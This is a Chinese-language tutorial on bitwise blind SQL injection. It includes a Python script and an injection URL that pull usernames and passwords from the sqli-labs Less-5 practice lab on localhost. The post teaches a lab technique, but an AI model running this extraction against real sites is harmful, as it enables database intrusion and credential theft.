如何提高sql盲注的效率和命中率一直是个值得研究的问题
目前的主流方法有
1.遍历
2.二分法
3.dns法
4.使用位运算
今天着重介绍位运算的方法
首先学习两个位运算符号<<(左移)>>(右移)
左移相当于乘2,右移相当于除以2
所以我们利用这个特性一个ascii码一个字节8位,我们循环8次就可以确定一个字符
例如:
s的ascii码值为115,换成2进制为 0111 0011
然后我们进行运算 0111 0011>>7=0
0111 0011>>6=01
......
也就是说每8次循环确定一个字符,非常高效快捷
import requests def bitOperation(url): result = "" # 存储获取的查询结果 url_bak = url # 外层循环由查询结果字符的长度控制,内层循环即为固定的7次位运算 for len in range(1, 777): # 此处长度可控,也可以不做判断直接给一个很长的数字 str = '0' # 设置当前字符的ascii码二进制的第一位默认为0 for i in range(0, 7): url = url.format(len, 6 - i, int(str + '0', 2)) # int(str + '0', 2)表示假设其第二位为0,若相等即条件为真,否则为假 r = requests.get(url) # 以页面正常时的标识关键字作为区分,存在是为0,不存在是为1 if r.text.find("You are in") != -1: str += '0' else: str += '1' url = url_bak # 二进制转换成十进制,也就是ascii码,再将ascii码转换成字符累加到result变量上 result += chr(int(str, 2)) print(result) if int(str, 2) == 0: # 不再作判断长度, 当ascii码为00000000时自动退出(多发7个请求) print("已超过此次查询字符串的长度,自动停止") return result if int(str, 2) == 127: print("查询内容不存在或语法错误...") return result return result url = "http://127.0.0.1/sqli-labs/Less-5/?id=1' and ascii(substr((select group_concat(concat_ws(0x7e,username,password)) from users),{},1))>>{}={}-- -" bitOperation(url)